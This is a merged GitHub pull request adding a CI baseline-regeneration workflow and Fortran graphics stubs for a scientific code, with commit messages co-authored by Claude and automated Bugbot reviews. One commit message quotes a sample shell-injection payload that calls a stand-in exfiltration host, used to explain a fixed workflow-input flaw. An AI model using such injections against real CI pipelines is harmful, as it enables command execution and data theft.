ci+eq+tr: workflow_dispatch baseline regen + graphics-stubs (#197) #198
Merged
Design for issue #197 (CI vs clavius gfortran 13.2/13.3 drift): add a workflow_dispatch CI job that regenerates baselines in CI's own environment, sidestepping the clavius cross-host drift that blocked PR #196.

Two-layer scope:
- Layer A (Fortran): eq_static_stubs.f90 + tr_static_stubs.f90 mirroring tot's existing graphics-stub pattern + Makefile gates. Enables standalone eq.x / tr2 builds without graphics libs in CI.
- Layer B (CI): .github/workflows/regen-baselines.yml with workflow_dispatch trigger, configurable `fixtures` input (default 'eq_tst2 tr_tst2'), artifact upload of generated metrics.json files.

Output handoff: artifact upload (MVP). Auto-PR / auto-commit deferred.

6 files in one commit (4 Fortran + 1 yaml + 1 spec). Approved scope from brainstorming on 2026-05-12.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Bite-sized 11-task implementation plan for the spec at docs/superpowers/specs/2026-05-12-ci-baseline-regen-workflow-design.md (committed 6deddeb, 4 Codex review rounds converged).

Structure:
- Pre-flight: worktree + sanity (Task 0.1)
- Phase 1 (Tasks 1-4): Layer A, eq + tr static stub files + Makefile GFLIBS gates. Per-file: copy from tot precedent, header adjust, body verify, AST sanity, Makefile edit, GFLIBS-empty smoke build.
- Phase 2 (Task 5): Layer B, full regen-baselines.yml workflow file embedded in the plan (~210 lines). YAML lint + referenced-file existence checks.
- Phase 3 (Tasks 6-7): Final verification (gate flips correctly in both GFLIBS directions) + single commit.
- Phase 4 (Tasks 8-10): Pre-push gate (bounded pytest + parallel reviewers) + push + PR.
- Phase 5 (Task 11): Trigger first workflow_dispatch + verify artifact.

Each task has exact commands, expected outputs, and (where bodies change) full code snippets. Workflow YAML is embedded verbatim.

Self-review: spec coverage complete (each §4 component → 1+ tasks), no placeholders (runtime values like <PR#> noted as substitutions), names consistent across tasks.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…/ tr2 (#197)

Adds an in-CI baseline-regeneration workflow plus the Fortran graphics-stubs that let the standalone eq / tr2 binaries build in CI's gfortran-13.2 / Ubuntu-24.04 / no-graphics environment. Closes #197 and unblocks the #190 (tr_tst2 baseline backfill) path that PR #196 ran into.

Layer A (Fortran):
- eq/eq_static_stubs.f90: NEW, copy of tot/tot_static_stubs.f90 with comment header adjusted for eq context. ~378 lines, ~100 GSAF no-op SUBROUTINEs + 2 FUNCTIONs.
- tr/tr_static_stubs.f90: NEW, same pattern for tr.
- eq/Makefile, tr/Makefile: add the `ifeq ($(strip $(GFLIBS)),)` gate (mirror tot/Makefile:64-70) that conditionally links EQ_STATIC_STUBS_OBJ / TR_STATIC_STUBS_OBJ into the standalone binary target. With GFLIBS populated (clavius / dev hosts), the gate expands to empty, so there is no link impact. With GFLIBS empty (CI / no-graphics), it links the stubs.

Layer B (CI):
- .github/workflows/regen-baselines.yml: NEW, ~210 lines.
  - workflow_dispatch trigger with `fixtures` input (default "eq_tst2 tr_tst2").
  - runs-on: ubuntu-24.04 (pinned, NOT ubuntu-latest), matching python-tests.yml's gfortran 13.2.0 environment.
  - concurrency block (mirrors python-tests.yml:15-17).
  - permissions: contents: read (least-privilege).
  - Per-module dump-path dispatch by fixture-name prefix (tr_* / eq_* / tot_* / fp_* / ti_* / wr_* / wrx_*).
  - Narrow failure detection: `test -s <dump>` guard distinguishes binary crash from expected baseline-mismatch.
  - Per-module shape check (jq): tr/eq require non-empty scalars; tot allows empty scalars (TR_PRESENT=0 valid per extract_tot_metrics.py:5-10).
  - Uploads regen-output/ as artifact (90-day retention).

Stub-duplication trade-off: 3 files (tot + eq + tr) now contain the same ~378-line no-op stub body. Accepted per spec §3 non-goals; a shared lib/ refactor is a follow-up. Stubs change rarely (every ~6 months when a new graphics symbol appears).

Spec: docs/superpowers/specs/2026-05-12-ci-baseline-regen-workflow-design.md (376 lines, 4 Codex review rounds converged).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
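The prefix dispatch and per-module shape check described above run as bash and jq inside the workflow, which this page does not show. As a rough illustration only, the same logic can be sketched in Python. The prefix table uses the narrowed set (tr_*/eq_*/tot_*) that the PR summary settles on, and the `scalars` key name plus the function names are assumptions, not taken from the repository.

```python
# Hypothetical prefix table: the narrowed set (tr_*/eq_*/tot_*) named in this PR.
PREFIX_TO_MODULE = {"tr_": "tr", "eq_": "eq", "tot_": "tot"}

# Per the PR text, tr and eq must report at least one scalar; tot may report none.
REQUIRE_NONEMPTY_SCALARS = {"tr", "eq"}


def module_for_fixture(fixture: str) -> str:
    """Map a fixture name such as 'eq_tst2' to its module by name prefix."""
    for prefix, module in PREFIX_TO_MODULE.items():
        if fixture.startswith(prefix):
            return module
    # Unsupported prefixes (fp/ti/wr/wrx in the PR) are rejected with a clear error.
    raise ValueError(f"unsupported fixture prefix: {fixture!r}")


def shape_ok(module: str, metrics: dict) -> bool:
    """Check the assumed 'scalars' entry of a parsed metrics.json document."""
    scalars = metrics.get("scalars")  # key name is an assumption
    if not isinstance(scalars, (dict, list)):
        return False
    if module in REQUIRE_NONEMPTY_SCALARS:
        return len(scalars) > 0
    return True  # tot: an empty scalars container is accepted


if __name__ == "__main__":
    module = module_for_fixture("eq_tst2")
    print(module, shape_ok(module, {"scalars": {"example": 1.0}}))
```

Keeping the emptiness rule in one set makes the tot exception explicit rather than burying it in a conditional.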
@cursor review
…cument env-pin divergence (Bugbot LOW)

Bugbot found 2 issues on PR #198 HEAD 98298ea:

- MEDIUM (security): the `for fixture in ${{ inputs.fixtures }}` line expanded the workflow_dispatch input directly into the shell script body before bash parsed it. A user with write access triggering the workflow could inject arbitrary shell commands through the fixtures input (e.g. `eq_tst2"; curl evil.example/exfil`). Mitigation: pass via `env: FIXTURES: ${{ inputs.fixtures }}` so bash reads it as a normal variable. The case-statement restriction to tr_*/eq_*/tot_* prefixes provides defense in depth.
- LOW (env divergence): this workflow pins runs-on: ubuntu-24.04 to match python-tests.yml's current gfortran 13.2.0, but python-tests.yml uses ubuntu-latest, which will silently rotate to a newer compiler. Documented the divergence risk inline with the mitigation (pin python-tests.yml when GH rotates).

Same workflow file; no test impact (the Bugbot findings affect runtime behaviour on triggered runs, not the workflow's static YAML structure or python-tests.yml flow).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
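The mitigation treats the `fixtures` input as data read from an environment variable, then restricts it to known prefixes. The actual fix is bash in the workflow; the Python analogue below only illustrates the idea. The regular expression and both function names are assumptions made for this sketch.

```python
import os
import re

# Assumed allowlist: a supported module prefix followed by word characters only.
FIXTURE_RE = re.compile(r"(?:tr|eq|tot)_[A-Za-z0-9_]+")


def parse_fixtures(raw: str) -> list:
    """Split a whitespace-separated fixtures string and reject unexpected names."""
    names = raw.split()
    bad = [name for name in names if not FIXTURE_RE.fullmatch(name)]
    if bad:
        raise ValueError(f"rejected fixture names: {bad}")
    return names


def fixtures_from_env(env=os.environ) -> list:
    """Read FIXTURES as plain data, mirroring `env: FIXTURES: ...` in the workflow."""
    return parse_fixtures(env.get("FIXTURES", "eq_tst2 tr_tst2"))


if __name__ == "__main__":
    print(fixtures_from_env({"FIXTURES": "eq_tst2 tr_tst2"}))
    try:
        # The injection payload quoted in the Bugbot finding.
        parse_fixtures('eq_tst2"; curl evil.example/exfil')
    except ValueError as exc:
        print("blocked:", exc)
```

Because the value is never spliced into program text, a payload like the one above can at worst fail validation; it cannot change which commands run.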
@cursor review
✅ Bugbot reviewed your changes and found no new issues!
Reviewed by Cursor Bugbot for commit 82786d6.
Summary
Closes #197 (CI baseline regen env mismatch: clavius gfortran 13.3 vs CI gfortran 13.2 produces ~3e-9 drift on `eq_tst2`/`tr_tst2` profile arrays). Unblocks #190 (`tr_tst2` baseline backfill).

Adds an in-CI baseline-regeneration workflow plus the Fortran graphics-stubs that let `eq.x`/`tr2` standalone binaries build in CI's gfortran-13.2 / Ubuntu-24.04 / no-graphics environment.

Background
PR #196 attempted to resolve #190 by regenerating baselines on clavius (gfortran 13.3). CI rejected the result at 1e-10 tolerance because of compiler-version drift. The diagnostic surfaced that baselines must be generated in the same environment they will be compared against — i.e., CI's Ubuntu 24.04 + gfortran 13.2. This PR is the environment-alignment infrastructure.
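To see why a ~3e-9 drift cannot pass a 1e-10 tolerance, here is a minimal sketch of an element-wise comparison. Whether the project's comparison is relative or absolute is not stated here, so the relative interpretation is an assumption, and the array values are made up for illustration rather than taken from any fixture.

```python
import math

REL_TOL = 1e-10  # tolerance quoted in the PR; relative interpretation is assumed


def within_tolerance(baseline, candidate, rel_tol=REL_TOL):
    """Return True if every element pair agrees to the given relative tolerance."""
    if len(baseline) != len(candidate):
        return False
    return all(
        math.isclose(b, c, rel_tol=rel_tol, abs_tol=0.0)
        for b, c in zip(baseline, candidate)
    )


if __name__ == "__main__":
    baseline = [1.0, 2.5, 4.0]  # illustrative values only
    drifted = [x * (1.0 + 3e-9) for x in baseline]  # cross-compiler-sized drift
    print(within_tolerance(baseline, baseline))
    print(within_tolerance(baseline, drifted))
```

The drift is about 30 times larger than the tolerance, so loosening the tolerance enough to absorb it would also hide real regressions of similar size. That is the case for regenerating in the comparison environment instead.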
Changes (5 files, 1 commit)
| File | Change |
|---|---|
| `eq/eq_static_stubs.f90` | Copy of `tot/tot_static_stubs.f90` body (~378 lines, ~100 GSAF no-op SUBROUTINEs + 2 FUNCTIONs); leading comment header customized for eq context |
| `tr/tr_static_stubs.f90` | Same pattern for tr |
| `eq/Makefile` | `EQ_STATIC_STUBS_OBJ` GFLIBS-empty gate (mirror `tot/Makefile:64-70`); include in `eq` target deps + link line |
| `tr/Makefile` | Same gate for the `tr2` target. Adaptation: uses `$(OBJDIR)/tr_static_stubs.o` because tr's compile rule is `${OBJDIR}/%.o: %.f90` only (eq has a flat `.f90.o:` rule, so eq stays unprefixed); documented inline |
| `.github/workflows/regen-baselines.yml` | `workflow_dispatch` trigger, `fixtures` input (default `"eq_tst2 tr_tst2"`); pinned `runs-on: ubuntu-24.04`; `concurrency:` + `permissions: contents: read`; uses `make -C tot libs` canonical build chain (in-house review MED #1); narrow failure detection (`test -s` guard); per-module shape check (tot allows empty scalars per `extract_tot_metrics.py:5-10`, others require non-empty); narrowed dispatch to supported prefixes (`tr_*`/`eq_*`/`tot_*`; `fp`/`ti`/`wr`/`wrx` rejected with clear error per Codex MED); `actions/upload-artifact@v4` with `retention-days: 90` + `if-no-files-found: error` |

Plus spec at `docs/superpowers/specs/2026-05-12-ci-baseline-regen-workflow-design.md` (376 lines, 4 Codex review rounds converged) and plan at `docs/superpowers/plans/2026-05-12-ci-baseline-regen-workflow.md` (891 lines, 12 tasks) in earlier commits on this branch.

Verification
- `make -n eq GFLIBS=""`/`<populated>` and `make -n tr2 GFLIBS=""`/`<populated>`: stub objects appear in the link line iff GFLIBS is empty. Both directions confirmed.
- `python3 -c "import yaml; yaml.safe_load(...)"` succeeds.
- `git diff origin/develop --name-only` excludes `test_pipeline.py` and `test_compare_metrics.py`, confirming the 2 pre-existing failures are not introduced by this PR.
- `python-tests.yml` workflow continues to PASS (this PR does not modify it).
- Trigger `regen-baselines.yml` from Actions UI with `fixtures="eq_tst2 tr_tst2"`. Should complete in ~10-15 min and produce a non-empty `baselines-<run-id>.zip` artifact containing `eq_tst2/metrics.json` (12 scalars) + `tr_tst2/metrics.json` (14 scalars incl. AJRFT=0.0).

Review trail
- … `fixtures` input.
- … `make.header`, fixed by copying full `python-tests.yml:112-134` content) → ✅.
- … `make -C tot libs` canonical chain, dropped unused PIC builds, narrowed case dispatch).

Follow-ups (post-merge)
After this PR merges:
1. Trigger `regen-baselines.yml` with `fixtures="eq_tst2 tr_tst2"`.
2. Commit the regenerated `metrics.json` files + remove the `@pytest.mark.xfail` decorator added in PR #195 (test(trlib): mirror eqlib eqdata fallback to fix silent SKIP (#192)). This closes #190 (tr_tst2 baseline: backfill AJRFT after eq_tst2 drift fix) cleanly.
3. `fp_*`/`ti_*`/`wr_*`/`wrx_*` fixtures: add `fp_static_stubs.f90` etc. + Makefile gates. Separate scope.

🤖 Generated with Claude Code
Note
Medium Risk
Adds a new GitHub Actions workflow that builds and runs standalone Fortran binaries in CI and changes `eq`/`tr2` link behavior when `GFLIBS` is empty; misconfiguration or missing stubs could break CI baseline regeneration or no-graphics builds.

Overview

Adds a new manual GitHub Actions workflow (`regen-baselines.yml`) to regenerate per-fixture `metrics.json` baselines inside CI's pinned `ubuntu-24.04`/gfortran environment, then upload the regenerated files as an artifact.

Enables no-graphics CI builds of the standalone `eq` and `tr2` binaries by adding large no-op graphics stub files (`eq_static_stubs.f90`, `tr_static_stubs.f90`) and gating their linkage in `eq/Makefile` and `tr/Makefile` when `GFLIBS` is empty, so baseline regen can run without graphics libraries.

Adds accompanying design/implementation documentation in `docs/superpowers/specs/...` and `docs/superpowers/plans/...` detailing the workflow, risks, and follow-up steps.

Reviewed by Cursor Bugbot for commit 82786d6. Bugbot is set up for automated code reviews on this repo.